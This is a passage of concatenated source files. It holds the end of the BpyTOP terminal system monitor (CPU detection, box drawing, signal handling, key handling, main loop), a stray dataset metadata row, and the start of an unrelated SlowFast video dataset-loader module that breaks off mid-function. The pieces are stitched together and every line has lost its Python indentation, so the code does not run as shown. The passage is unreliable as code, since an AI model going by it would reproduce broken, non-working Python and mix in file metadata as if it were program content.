for _i in range(7):
perc = f'{str(round((_i + 1) * 14 + 2)) + "%":>5}'
Draw.buffer("+banner", f'{Mv.to(Term.height // 2 - 2 + _i, Term.width // 2 - 28)}{Fx.trans(perc)}{Symbol.v_line}')
Draw.out("banner")
Draw.buffer("+init!", f'{Color.fg("#cc")}{Fx.b}{Mv.to(Term.height // 2 - 2, Term.width // 2 - 21)}{Mv.save}')
cls.initbg_data = [randint(0, 100) for _ in range(Term.width * 2)]
cls.initbg_up = Graph(Term.width, Term.height // 2, cls.initbg_colors, cls.initbg_data, invert=True)
cls.initbg_down = Graph(Term.width, Term.height // 2, cls.initbg_colors, cls.initbg_data, invert=False)
@classmethod
def success(cls):
if not CONFIG.show_init or cls.resized: return
cls.draw_bg(5)
Draw.buffer("+init!", f'{Mv.restore}{Symbol.ok}\n{Mv.r(Term.width // 2 - 22)}{Mv.save}')
@staticmethod
def fail(err):
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Symbol.fail}')
sleep(2)
errlog.exception(f'{err}')
clean_quit(1, errmsg=f'Error during init! See {CONFIG_DIR}/error.log for more information.')
@classmethod
def draw_bg(cls, times: int = 5):
for _ in range(times):
sleep(0.05)
x = randint(0, 100)
Draw.buffer("initbg", f'{Fx.ub}{Mv.to(0, 0)}{cls.initbg_up(x)}{Mv.to(Term.height // 2, 0)}{cls.initbg_down(x)}')
Draw.out("initbg", "banner", "init")
@classmethod
def done(cls):
cls.running = False
if not CONFIG.show_init: return
if cls.resized:
Draw.now(Term.clear)
else:
cls.draw_bg(10)
Draw.clear("initbg", "banner", "init", saved=True)
if cls.resized: return
del cls.initbg_up, cls.initbg_down, cls.initbg_data, cls.initbg_colors
#? Functions ------------------------------------------------------------------------------------->
def get_cpu_name() -> str:
'''Fetch a suitable CPU identifier from the CPU model name string'''
name: str = ""
nlist: List = []
command: str = ""
cmd_out: str = ""
rem_line: str = ""
if SYSTEM == "Linux":
command = "cat /proc/cpuinfo"
rem_line = "model name"
elif SYSTEM == "MacOS":
command ="sysctl -n machdep.cpu.brand_string"
elif SYSTEM == "BSD":
command ="sysctl hw.model"
rem_line = "hw.model"
try:
cmd_out = subprocess.check_output("LANG=C " + command, shell=True, universal_newlines=True)
except:
pass
if rem_line:
for line in cmd_out.split("\n"):
if rem_line in line:
name = re.sub( ".*" + rem_line + ".*:", "", line,1).lstrip()
else:
name = cmd_out
nlist = name.split(" ")
try:
if "Xeon" in name and "CPU" in name:
name = nlist[nlist.index("CPU")+(-1 if name.endswith(("CPU", "z")) else 1)]
elif "Ryzen" in name:
name = " ".join(nlist[nlist.index("Ryzen"):nlist.index("Ryzen")+3])
elif "Duo" in name and "@" in name:
name = " ".join(nlist[:nlist.index("@")])
elif "CPU" in name and not nlist[0] == "CPU" and not nlist[nlist.index("CPU")-1].isdigit():
name = nlist[nlist.index("CPU")-1]
except:
pass
name = name.replace("Processor", "").replace("CPU", "").replace("(R)", "").replace("(TM)", "").replace("Intel", "")
name = re.sub(r"\d?\.?\d+[mMgG][hH][zZ]", "", name)
name = " ".join(name.split())
return name
def get_cpu_core_mapping() -> List[int]:
mapping: List[int] = []
core_ids: List[int] = []
if SYSTEM == "Linux" and os.path.isfile("/proc/cpuinfo"):
try:
mapping = [0] * THREADS
num = 0
with open("/proc/cpuinfo", "r") as f:
for line in f:
if line.startswith("processor"):
num = int(line.strip()[(line.index(": ")+2):])
if num > THREADS - 1:
break
elif line.startswith("core id"):
core_id = int(line.strip()[(line.index(": ")+2):])
if core_id not in core_ids:
core_ids.append(core_id)
mapping[num] = core_ids.index(core_id)
if num < THREADS - 1:
raise Exception
except:
mapping = []
if not mapping:
mapping = []
for _ in range(THREADS // CORES):
mapping.extend([x for x in range(CORES)])
return mapping
def create_box(x: int = 0, y: int = 0, width: int = 0, height: int = 0, title: str = "", title2: str = "", line_color: Color = None, title_color: Color = None, fill: bool = True, box = None) -> str:
'''Create a box from a box object or by given arguments'''
out: str = f'{Term.fg}{Term.bg}'
num: int = 0
if not line_color: line_color = THEME.div_line
if not title_color: title_color = THEME.title
#* Get values from box class if given
if box:
x = box.x
y = box.y
width = box.width
height = box.height
title = box.name
num = box.num
hlines: Tuple[int, int] = (y, y + height - 1)
out += f'{line_color}'
#* Draw all horizontal lines
for hpos in hlines:
out += f'{Mv.to(hpos, x)}{Symbol.h_line * (width - 1)}'
#* Draw all vertical lines and fill if enabled
for hpos in range(hlines[0]+1, hlines[1]):
out += f'{Mv.to(hpos, x)}{Symbol.v_line}{" " * (width-2) if fill else Mv.r(width-2)}{Symbol.v_line}'
#* Draw corners
out += f'{Mv.to(y, x)}{Symbol.left_up}\
{Mv.to(y, x + width - 1)}{Symbol.right_up}\
{Mv.to(y + height - 1, x)}{Symbol.left_down}\
{Mv.to(y + height - 1, x + width - 1)}{Symbol.right_down}'
#* Draw titles if enabled
if title:
numbered: str = "" if not num else f'{THEME.hi_fg(SUPERSCRIPT[num])}'
out += f'{Mv.to(y, x + 2)}{Symbol.title_left}{Fx.b}{numbered}{title_color}{title}{Fx.ub}{line_color}{Symbol.title_right}'
if title2:
out += f'{Mv.to(hlines[1], x + 2)}{Symbol.title_left}{title_color}{Fx.b}{title2}{Fx.ub}{line_color}{Symbol.title_right}'
return f'{out}{Term.fg}{Mv.to(y + 1, x + 1)}'
def now_sleeping(signum, frame):
"""Reset terminal settings and stop background input read before putting to sleep"""
Key.stop()
Collector.stop()
Draw.now(Term.clear, Term.normal_screen, Term.show_cursor, Term.mouse_off, Term.mouse_direct_off, Term.title())
Term.echo(True)
os.kill(os.getpid(), signal.SIGSTOP)
def now_awake(signum, frame):
"""Set terminal settings and restart background input read"""
Draw.now(Term.alt_screen, Term.clear, Term.hide_cursor, Term.mouse_on, Term.title("BpyTOP"))
Term.echo(False)
Key.start()
Term.refresh()
Box.calc_sizes()
Box.draw_bg()
Collector.start()
def quit_sigint(signum, frame):
"""SIGINT redirection to clean_quit()"""
clean_quit()
def clean_quit(errcode: int = 0, errmsg: str = "", thread: bool = False):
"""Stop background input read, save current config and reset terminal settings before quitting"""
global THREAD_ERROR
if thread:
THREAD_ERROR = errcode
interrupt_main()
return
if THREAD_ERROR: errcode = THREAD_ERROR
Key.stop()
Collector.stop()
if not errcode: CONFIG.save_config()
Draw.now(Term.clear, Term.normal_screen, Term.show_cursor, Term.mouse_off, Term.mouse_direct_off, Term.title())
Term.echo(True)
if errcode == 0:
errlog.info(f'Exiting. Runtime {timedelta(seconds=round(time() - SELF_START, 0))} \n')
else:
errlog.warning(f'Exiting with errorcode ({errcode}). Runtime {timedelta(seconds=round(time() - SELF_START, 0))} \n')
if not errmsg: errmsg = f'Bpytop exited with errorcode ({errcode}). See {CONFIG_DIR}/error.log for more information!'
if errmsg: print(errmsg)
raise SystemExit(errcode)
def floating_humanizer(value: Union[float, int], bit: bool = False, per_second: bool = False, start: int = 0, short: bool = False) -> str:
'''Scales up in steps of 1024 to highest possible unit and returns string with unit suffixed
* bit=True or defaults to bytes
* start=int to set 1024 multiplier starting unit
* short=True always returns 0 decimals and shortens unit to 1 character
'''
out: str = ""
mult: int = 8 if bit else 1
selector: int = start
unit: Tuple[str, ...] = UNITS["bit"] if bit else UNITS["byte"]
if isinstance(value, float): value = round(value * 100 * mult)
elif value > 0: value *= 100 * mult
else: value = 0
while len(f'{value}') > 5 and value >= 102400:
value >>= 10
if value < 100:
out = f'{value}'
break
selector += 1
else:
if len(f'{value}') == 4 and selector > 0:
out = f'{value}'[:-2] + "." + f'{value}'[-2]
elif len(f'{value}') == 3 and selector > 0:
out = f'{value}'[:-2] + "." + f'{value}'[-2:]
elif len(f'{value}') >= 2:
out = f'{value}'[:-2]
else:
out = f'{value}'
if short:
if "." in out:
out = f'{round(float(out))}'
if len(out) > 3:
out = f'{int(out[0]) + 1}'
selector += 1
out += f'{"" if short else " "}{unit[selector][0] if short else unit[selector]}'
if per_second: out += "ps" if bit else "/s"
return out
def units_to_bytes(value: str) -> int:
if not value: return 0
out: int = 0
mult: int = 0
bit: bool = False
value_i: int = 0
units: Dict[str, int] = {"k" : 1, "m" : 2, "g" : 3}
try:
if value.lower().endswith("s"):
value = value[:-1]
if value.lower().endswith("bit"):
bit = True
value = value[:-3]
elif value.lower().endswith("byte"):
value = value[:-4]
if value[-1].lower() in units:
mult = units[value[-1].lower()]
value = value[:-1]
if "." in value and value.replace(".", "").isdigit():
if mult > 0:
value_i = round(float(value) * 1024)
mult -= 1
else:
value_i = round(float(value))
elif value.isdigit():
value_i = int(value)
out = int(value_i) << (10 * mult)
if bit: out = round(out / 8)
except ValueError:
out = 0
return out
def min_max(value: int, min_value: int=0, max_value: int=100) -> int:
return max(min_value, min(value, max_value))
def readfile(file: str, default: str = "") -> str:
out: Union[str, None] = None
if os.path.isfile(file):
try:
with open(file, "r") as f:
out = f.read().strip()
except:
pass
return default if out is None else out
def temperature(value: int, scale: str = "celsius") -> Tuple[int, str]:
"""Returns a tuple with integer value and string unit converted from an integer in celsius to: celsius, fahrenheit, kelvin or rankine."""
if scale == "celsius":
return (value, "°C")
elif scale == "fahrenheit":
return (round(value * 1.8 + 32), "°F")
elif scale == "kelvin":
return (round(value + 273.15), "K ")
elif scale == "rankine":
return (round(value * 1.8 + 491.67), "°R")
else:
return (0, "")
def process_keys():
mouse_pos: Tuple[int, int] = (0, 0)
filtered: bool = False
box_keys = {"1" : "cpu", "2" : "mem", "3" : "net", "4" : "proc"}
while Key.has_key():
key = Key.get()
found: bool = True
if key in ["mouse_scroll_up", "mouse_scroll_down", "mouse_click"]:
mouse_pos = Key.get_mouse()
if mouse_pos[0] >= ProcBox.x and ProcBox.current_y + 1 <= mouse_pos[1] < ProcBox.current_y + ProcBox.current_h - 1:
pass
elif key == "mouse_click":
key = "mouse_unselect"
else:
key = "_null"
if ProcBox.filtering:
if key in ["enter", "mouse_click", "mouse_unselect"]:
ProcBox.filtering = False
Collector.collect(ProcCollector, redraw=True, only_draw=True)
continue
elif key in ["escape", "delete"]:
ProcCollector.search_filter = ""
ProcBox.filtering = False
elif len(key) == 1:
ProcCollector.search_filter += key
elif key == "backspace" and len(ProcCollector.search_filter) > 0:
ProcCollector.search_filter = ProcCollector.search_filter[:-1]
else:
continue
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
if filtered: Collector.collect_done.wait(0.1)
filtered = True
continue
if key == "_null":
continue
elif key == "q":
clean_quit()
elif key == "+" and CONFIG.update_ms + 100 <= 86399900:
CONFIG.update_ms += 100
Box.draw_update_ms()
elif key == "-" and CONFIG.update_ms - 100 >= 100:
CONFIG.update_ms -= 100
Box.draw_update_ms()
elif key in ["M", "escape"]:
Menu.main()
elif key in ["o", "f2"]:
Menu.options()
elif key in ["H", "f1"]:
Menu.help()
elif key == "m":
if list(Box.view_modes).index(Box.view_mode) + 1 > len(list(Box.view_modes)) - 1:
Box.view_mode = list(Box.view_modes)[0]
else:
Box.view_mode = list(Box.view_modes)[(list(Box.view_modes).index(Box.view_mode) + 1)]
CONFIG.shown_boxes = " ".join(Box.view_modes[Box.view_mode])
Draw.clear(saved=True)
Term.refresh(force=True)
elif key in box_keys:
boxes = CONFIG.shown_boxes.split()
if box_keys[key] in boxes:
boxes.remove(box_keys[key])
else:
boxes.append(box_keys[key])
CONFIG.shown_boxes = " ".join(boxes)
Box.view_mode = "user"
Box.view_modes["user"] = CONFIG.shown_boxes.split()
Draw.clear(saved=True)
Term.refresh(force=True)
else:
found = False
if found: continue
if "proc" in Box.boxes:
if key in ["left", "right", "h", "l"]:
ProcCollector.sorting(key)
elif key == " " and CONFIG.proc_tree and ProcBox.selected > 0:
if ProcBox.selected_pid in ProcCollector.collapsed:
ProcCollector.collapsed[ProcBox.selected_pid] = not ProcCollector.collapsed[ProcBox.selected_pid]
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "e":
CONFIG.proc_tree = not CONFIG.proc_tree
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "r":
CONFIG.proc_reversed = not CONFIG.proc_reversed
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "c":
CONFIG.proc_per_core = not CONFIG.proc_per_core
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key in ["f", "F"]:
ProcBox.filtering = True
ProcCollector.case_sensitive = key == "F"
if not ProcCollector.search_filter: ProcBox.start = 0
Collector.collect(ProcCollector, redraw=True, only_draw=True)
elif key in ["T", "K", "I"] and (ProcBox.selected > 0 or ProcCollector.detailed):
pid: int = ProcBox.selected_pid if ProcBox.selected > 0 else ProcCollector.detailed_pid # type: ignore
if psutil.pid_exists(pid):
if key == "T": sig = signal.SIGTERM
elif key == "K": sig = signal.SIGKILL
elif key == "I": sig = signal.SIGINT
try:
os.kill(pid, sig)
except Exception as e:
errlog.error(f'Exception when sending signal {sig} to pid {pid}')
errlog.exception(f'{e}')
elif key == "delete" and ProcCollector.search_filter:
ProcCollector.search_filter = ""
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
elif key == "enter":
if ProcBox.selected > 0 and ProcCollector.detailed_pid != ProcBox.selected_pid and psutil.pid_exists(ProcBox.selected_pid):
ProcCollector.detailed = True
ProcBox.last_selection = ProcBox.selected
ProcBox.selected = 0
ProcCollector.detailed_pid = ProcBox.selected_pid
ProcBox.resized = True
Collector.proc_counter = 1
elif ProcCollector.detailed:
ProcBox.selected = ProcBox.last_selection
ProcBox.last_selection = 0
ProcCollector.detailed = False
ProcCollector.detailed_pid = None
ProcBox.resized = True
Collector.proc_counter = 1
else:
continue
ProcCollector.details = {}
ProcCollector.details_cpu = []
ProcCollector.details_mem = []
Graphs.detailed_cpu = NotImplemented
Graphs.detailed_mem = NotImplemented
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
elif key in ["up", "down", "mouse_scroll_up", "mouse_scroll_down", "page_up", "page_down", "home", "end", "mouse_click", "mouse_unselect", "j", "k"]:
ProcBox.selector(key, mouse_pos)
if "net" in Box.boxes:
if key in ["b", "n"]:
NetCollector.switch(key)
elif key == "z":
NetCollector.reset = not NetCollector.reset
Collector.collect(NetCollector, redraw=True)
elif key == "y":
CONFIG.net_sync = not CONFIG.net_sync
Collector.collect(NetCollector, redraw=True)
elif key == "a":
NetCollector.auto_min = not NetCollector.auto_min
NetCollector.net_min = {"download" : -1, "upload" : -1}
Collector.collect(NetCollector, redraw=True)
if "mem" in Box.boxes:
if key == "g":
CONFIG.mem_graphs = not CONFIG.mem_graphs
Collector.collect(MemCollector, interrupt=True, redraw=True)
elif key == "s":
Collector.collect_idle.wait()
CONFIG.swap_disk = not CONFIG.swap_disk
Collector.collect(MemCollector, interrupt=True, redraw=True)
elif key == "d":
Collector.collect_idle.wait()
CONFIG.show_disks = not CONFIG.show_disks
Collector.collect(MemCollector, interrupt=True, redraw=True)
elif key == "i":
Collector.collect_idle.wait()
CONFIG.io_mode = not CONFIG.io_mode
Collector.collect(MemCollector, interrupt=True, redraw=True)
#? Pre main -------------------------------------------------------------------------------------->
CPU_NAME: str = get_cpu_name()
CORE_MAP: List[int] = get_cpu_core_mapping()
THEME: Theme
def main():
global THEME
Term.width = os.get_terminal_size().columns
Term.height = os.get_terminal_size().lines
#? Init -------------------------------------------------------------------------------------->
if DEBUG: TimeIt.start("Init")
#? Switch to alternate screen, clear screen, hide cursor, enable mouse reporting and disable input echo
Draw.now(Term.alt_screen, Term.clear, Term.hide_cursor, Term.mouse_on, Term.title("BpyTOP"))
Term.echo(False)
#Term.refresh(force=True)
#? Start a thread checking for updates while running init
if CONFIG.update_check: UpdateChecker.run()
#? Draw banner and init status
if CONFIG.show_init and not Init.resized:
Init.start()
#? Load theme
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Loading theme and creating colors... ")}{Mv.save}')
try:
THEME = Theme(CONFIG.color_theme)
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Setup boxes
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Doing some maths and drawing... ")}{Mv.save}')
try:
if CONFIG.check_temp: CpuCollector.get_sensors()
Box.calc_sizes()
Box.draw_bg(now=False)
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Setup signal handlers for SIGSTP, SIGCONT, SIGINT and SIGWINCH
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Setting up signal handlers... ")}{Mv.save}')
try:
signal.signal(signal.SIGTSTP, now_sleeping) #* Ctrl-Z
signal.signal(signal.SIGCONT, now_awake) #* Resume
signal.signal(signal.SIGINT, quit_sigint) #* Ctrl-C
signal.signal(signal.SIGWINCH, Term.refresh) #* Terminal resized
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Start a separate thread for reading keyboard input
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Starting input reader thread... ")}{Mv.save}')
try:
if isinstance(sys.stdin, io.TextIOWrapper) and sys.version_info >= (3, 7):
sys.stdin.reconfigure(errors="ignore") # type: ignore
Key.start()
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Start a separate thread for data collection and drawing
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Starting data collection and drawer thread... ")}{Mv.save}')
try:
Collector.start()
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Collect data and draw to buffer
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Collecting data and drawing... ")}{Mv.save}')
try:
Collector.collect(draw_now=False)
pass
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Draw to screen
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Finishing up... ")}{Mv.save}')
try:
Collector.collect_done.wait()
except Exception as e:
Init.fail(e)
else:
Init.success()
Init.done()
Term.refresh()
Draw.out(clear=True)
if CONFIG.draw_clock:
Box.clock_on = True
if DEBUG: TimeIt.stop("Init")
#? Main loop ------------------------------------------------------------------------------------->
def run():
while not False:
Term.refresh()
Timer.stamp()
while Timer.not_zero():
if Key.input_wait(Timer.left()):
process_keys()
Collector.collect()
#? Start main loop
try:
run()
except Exception as e:
errlog.exception(f'{e}')
clean_quit(1)
else:
#? Quit cleanly even if false starts being true...
clean_quit()
if __name__ == "__main__":
main()
| 37.802334 | 541 | 0.632463 |
1bbeb584d661c3ceb8c4da58baca1c42906a21ca | 24,181 | py | Python | build/lib/slowfast/datasets/ptv_datasets.py | shir3bar/SlowFast | 9a234526ee2056db8b9f89845ed34f70da225ba0 | [
"Apache-2.0"
] | null | null | null | build/lib/slowfast/datasets/ptv_datasets.py | shir3bar/SlowFast | 9a234526ee2056db8b9f89845ed34f70da225ba0 | [
"Apache-2.0"
] | null | null | null | build/lib/slowfast/datasets/ptv_datasets.py | shir3bar/SlowFast | 9a234526ee2056db8b9f89845ed34f70da225ba0 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import cv2
import numpy
numpy.random.normal()
import functools
import os
from typing import Dict
import torch
from torch.utils.data import (
DistributedSampler,
RandomSampler,
SequentialSampler,
)
from torchvision.transforms import Compose, Lambda
from torchvision.transforms._transforms_video import (
NormalizeVideo,
RandomCropVideo,
RandomHorizontalFlipVideo,
)
import slowfast.utils.logging as logging
from pytorchvideo.data import (
Charades,
LabeledVideoDataset,
SSv2,
make_clip_sampler,
)
from pytorchvideo.data.labeled_video_paths import LabeledVideoPaths
from pytorchvideo.transforms import (
ApplyTransformToKey,
RandomShortSideScale,
ShortSideScale,
UniformCropVideo,
UniformTemporalSubsample,
)
from . import utils as utils
from .build import DATASET_REGISTRY
logger = logging.get_logger(__name__)
class PTVDatasetWrapper(torch.utils.data.IterableDataset):
"""
Wrapper for PyTorchVideo datasets.
"""
def __init__(self, num_videos, clips_per_video, crops_per_clip, dataset):
"""
Construct the dataset.
Args:
num_vidoes (int): number of videos in the dataset.
clips_per_video (int): number of clips per video in the dataset.
dataset (torch.utils.data.IterableDataset): a PyTorchVideo dataset.
"""
self._clips_per_video = clips_per_video
self._crops_per_clip = crops_per_clip
self._num_videos = num_videos
self.dataset = dataset
def __next__(self):
"""
Retrieves the next clip from the dataset.
"""
return self.dataset.__next__()
@property
def sampler(self):
"""
Returns:
(torch.utils.data.Sampler): video sampler for the dataset.
"""
return self.dataset.video_sampler
def __len__(self):
"""
Returns:
(int): the number of clips per replica in the IterableDataset.
"""
return len(self.sampler) * self._clips_per_video * self._crops_per_clip
@property
def num_videos(self):
"""
Returns:
(int): the number of clips in total in the dataset.
"""
return self._num_videos * self._clips_per_video * self._crops_per_clip
def __iter__(self):
return self
class PackPathway(torch.nn.Module):
"""
Transform for converting video frames as a list of tensors. Each tensor
corresponding to a unique pathway.
"""
def __init__(self, cfg):
super().__init__()
self.cfg = cfg
def forward(self, x: torch.Tensor):
return utils.pack_pathway_output(self.cfg, x)
class DictToTuple(torch.nn.Module):
"""
Transform for converting output from dict to a tuple following PySlowFast
dataset output format.
"""
def __init__(self, num_clips, num_crops):
super().__init__()
self._num_clips = num_clips
self._num_crops = num_crops
def forward(self, x: Dict[str, torch.Tensor]):
index = (
x["video_index"] * self._num_clips * self._num_crops
+ x["clip_index"] * self._num_crops
+ x["aug_index"]
)
return x["video"], x["label"], index, {}
def div255(x):
"""
Scale clip frames from [0, 255] to [0, 1].
Args:
x (Tensor): A tensor of the clip's RGB frames with shape:
(channel, time, height, width).
Returns:
x (Tensor): Scaled tensor by divide 255.
"""
return x / 255.0
def rgb2gray(x):
"""
Convert clip frames from RGB mode to BRG mode.
Args:
x (Tensor): A tensor of the clip's RGB frames with shape:
(channel, time, height, width).
Returns:
x (Tensor): Converted tensor
"""
return x[[0], ...]
@DATASET_REGISTRY.register()
def Ptvkinetics(cfg, mode):
"""
Construct the Kinetics video loader with a given csv file. The format of
the csv file is:
```
path_to_video_1 label_1
path_to_video_2 label_2
...
path_to_video_N label_N
```
For `train` and `val` mode, a single clip is randomly sampled from every video
with random cropping, scaling, and flipping. For `test` mode, multiple clips are
uniformaly sampled from every video with center cropping.
Args:
cfg (CfgNode): configs.
mode (string): Options includes `train`, `val`, or `test` mode.
For the train and val mode, the data loader will take data
from the train or val set, and sample one clip per video.
For the test mode, the data loader will take data from test set,
and sample multiple clips per video.
"""
# Only support train, val, and test mode.
assert mode in [
"train",
"val",
"test",
], "Split '{}' not supported".format(mode)
logger.info("Constructing Ptvkinetics {}...".format(mode))
clip_duration = (
cfg.DATA.NUM_FRAMES * cfg.DATA.SAMPLING_RATE / cfg.DATA.TARGET_FPS
)
path_to_file = os.path.join(
cfg.DATA.PATH_TO_DATA_DIR, "{}.csv".format(mode)
)
labeled_video_paths = LabeledVideoPaths.from_path(path_to_file)
num_videos = len(labeled_video_paths)
labeled_video_paths.path_prefix = cfg.DATA.PATH_PREFIX
logger.info(
"Constructing kinetics dataloader (size: {}) from {}".format(
num_videos, path_to_file
)
)
if mode in ["train", "val"]:
num_clips = 1
num_crops = 1
transform = Compose(
[
ApplyTransformToKey(
key="video",
transform=Compose(
[
UniformTemporalSubsample(cfg.DATA.NUM_FRAMES),
Lambda(div255),
NormalizeVideo(cfg.DATA.MEAN, cfg.DATA.STD),
RandomShortSideScale(
min_size=cfg.DATA.TRAIN_JITTER_SCALES[0],
max_size=cfg.DATA.TRAIN_JITTER_SCALES[1],
),
RandomCropVideo(cfg.DATA.TRAIN_CROP_SIZE),
]
+ (
[RandomHorizontalFlipVideo(p=0.5)]
if cfg.DATA.RANDOM_FLIP
else []
)
+ [PackPathway(cfg)]
),
),
DictToTuple(num_clips, num_crops),
]
)
clip_sampler = make_clip_sampler("random", clip_duration)
if cfg.NUM_GPUS > 1:
video_sampler = DistributedSampler
else:
video_sampler = (
RandomSampler if mode == "train" else SequentialSampler
)
else:
num_clips = cfg.TEST.NUM_ENSEMBLE_VIEWS
num_crops = cfg.TEST.NUM_SPATIAL_CROPS
transform = Compose(
[
ApplyTransformToKey(
key="video",
transform=Compose(
[
UniformTemporalSubsample(cfg.DATA.NUM_FRAMES),
Lambda(div255),
NormalizeVideo(cfg.DATA.MEAN, cfg.DATA.STD),
ShortSideScale(
size=cfg.DATA.TRAIN_JITTER_SCALES[0]
),
]
),
),
UniformCropVideo(size=cfg.DATA.TEST_CROP_SIZE),
ApplyTransformToKey(key="video", transform=PackPathway(cfg)),
DictToTuple(num_clips, num_crops),
]
)
clip_sampler = make_clip_sampler(
"constant_clips_per_video",
clip_duration,
num_clips,
num_crops,
)
video_sampler = (
DistributedSampler if cfg.NUM_GPUS > 1 else SequentialSampler
)
return PTVDatasetWrapper(
num_videos=num_videos,
clips_per_video=num_clips,
crops_per_clip=num_crops,
dataset=LabeledVideoDataset(
labeled_video_paths=labeled_video_paths,
clip_sampler=clip_sampler,
video_sampler=video_sampler,
transform=transform,
decode_audio=False,
),
)
def process_charades_label(x, mode, num_classes):
"""
Process the video label for Charades dataset. Use video-level label for
training mode, otherwise use clip-level label. Then convert the label into
a binary vector.
Args:
x (dict): a video clip including label index.
mode (string): Options includes `train`, `val`, or `test` mode.
num_classes (int): Number of classes in the dataset.
Returns:
x (dict): video clip with updated label information.
"""
label = (
utils.aggregate_labels(x["label"])
if mode == "train"
else x["video_label"]
)
x["label"] = torch.as_tensor(utils.as_binary_vector(label, num_classes))
return x
def rgb2bgr(x):
"""
Convert clip frames from RGB mode to BRG mode.
Args:
x (Tensor): A tensor of the clip's RGB frames with shape:
(channel, time, height, width).
Returns:
x (Tensor): Converted tensor
"""
return x[[2, 1, 0], ...]
@DATASET_REGISTRY.register()
def Ptvcharades(cfg, mode):
"""
Construct PyTorchVideo Charades video loader.
Load Charades data (frame paths, labels, etc. ) to Charades Dataset object.
The dataset could be downloaded from Chrades official website
(https://allenai.org/plato/charades/).
Please see datasets/DATASET.md for more information about the data format.
For `train` and `val` mode, a single clip is randomly sampled from every video
with random cropping, scaling, and flipping. For `test` mode, multiple clips are
uniformaly sampled from every video with center cropping.
Args:
cfg (CfgNode): configs.
mode (string): Options includes `train`, `val`, or `test` mode.
For the train and val mode, the data loader will take data
from the train or val set, and sample one clip per video.
For the test mode, the data loader will take data from test set,
and sample multiple clips per video.
"""
# Only support train, val, and test mode.
assert mode in [
"train",
"val",
"test",
], "Split '{}' not supported".format(mode)
logger.info("Constructing Ptvcharades {}...".format(mode))
clip_duration = (
(cfg.DATA.NUM_FRAMES - 1) * cfg.DATA.SAMPLING_RATE + 1
) / cfg.DATA.TARGET_FPS
if mode in ["train", "val"]:
num_clips = 1
num_crops = 1
transform = Compose(
[
ApplyTransformToKey(
key="video",
transform=Compose(
[
Lambda(div255),
NormalizeVideo(cfg.DATA.MEAN, cfg.DATA.STD),
RandomShortSideScale(
min_size=cfg.DATA.TRAIN_JITTER_SCALES[0],
max_size=cfg.DATA.TRAIN_JITTER_SCALES[1],
),
RandomCropVideo(cfg.DATA.TRAIN_CROP_SIZE),
Lambda(rgb2bgr),
]
+ (
[RandomHorizontalFlipVideo(p=0.5)]
if cfg.DATA.RANDOM_FLIP
else []
)
+ [PackPathway(cfg)]
),
),
Lambda(
functools.partial(
process_charades_label,
mode=mode,
num_classes=cfg.MODEL.NUM_CLASSES,
)
),
DictToTuple(num_clips, num_crops),
]
)
clip_sampler = make_clip_sampler("random", clip_duration)
if cfg.NUM_GPUS > 1:
video_sampler = DistributedSampler
else:
video_sampler = (
RandomSampler if mode == "train" else SequentialSampler
)
else:
num_clips = cfg.TEST.NUM_ENSEMBLE_VIEWS
num_crops = cfg.TEST.NUM_SPATIAL_CROPS
transform = Compose(
[
ApplyTransformToKey(
key="video",
transform=Compose(
[
Lambda(div255),
NormalizeVideo(cfg.DATA.MEAN, cfg.DATA.STD),
ShortSideScale(size=cfg.DATA.TEST_CROP_SIZE),
]
),
),
UniformCropVideo(size=cfg.DATA.TEST_CROP_SIZE),
Lambda(
functools.partial(
process_charades_label,
mode=mode,
num_classes=cfg.MODEL.NUM_CLASSES,
)
),
ApplyTransformToKey(
key="video",
transform=Compose(
[Lambda(rgb2bgr), PackPathway(cfg)],
),
),
DictToTuple(num_clips, num_crops),
]
)
clip_sampler = make_clip_sampler(
"constant_clips_per_video",
clip_duration,
num_clips,
num_crops,
)
video_sampler = (
DistributedSampler if cfg.NUM_GPUS > 1 else SequentialSampler
)
data_path = os.path.join(cfg.DATA.PATH_TO_DATA_DIR, "{}.csv".format(mode))
dataset = Charades(
data_path=data_path,
clip_sampler=clip_sampler,
video_sampler=video_sampler,
transform=transform,
video_path_prefix=cfg.DATA.PATH_PREFIX,
frames_per_clip=cfg.DATA.NUM_FRAMES,
)
logger.info(
"Constructing charades dataloader (size: {}) from {}".format(
len(dataset._path_to_videos), data_path
)
)
return PTVDatasetWrapper(
num_videos=len(dataset._path_to_videos),
clips_per_video=num_clips,
crops_per_clip=num_crops,
dataset=dataset,
)
@DATASET_REGISTRY.register()
def Ptvssv2(cfg, mode):
"""
Construct PyTorchVideo Something-Something v2 SSv2 video loader.
Load SSv2 data (frame paths, labels, etc. ) to SSv2 Dataset object.
The dataset could be downloaded from Chrades official website
(https://20bn.com/datasets/something-something).
Please see datasets/DATASET.md for more information about the data format.
For training and validation, a single clip is randomly sampled from every
video with random cropping and scaling. For testing, multiple clips are
uniformaly sampled from every video with uniform cropping. For uniform cropping,
we take the left, center, and right crop if the width is larger than height,
or take top, center, and bottom crop if the height is larger than the width.
Args:
cfg (CfgNode): configs.
mode (string): Options includes `train`, `val`, or `test` mode.
"""
# Only support train, val, and test mode.
assert mode in [
"train",
"val",
"test",
], "Split '{}' not supported".format(mode)
logger.info("Constructing Ptvcharades {}...".format(mode))
if mode in ["train", "val"]:
num_clips = 1
num_crops = 1
transform = Compose(
[
ApplyTransformToKey(
key="video",
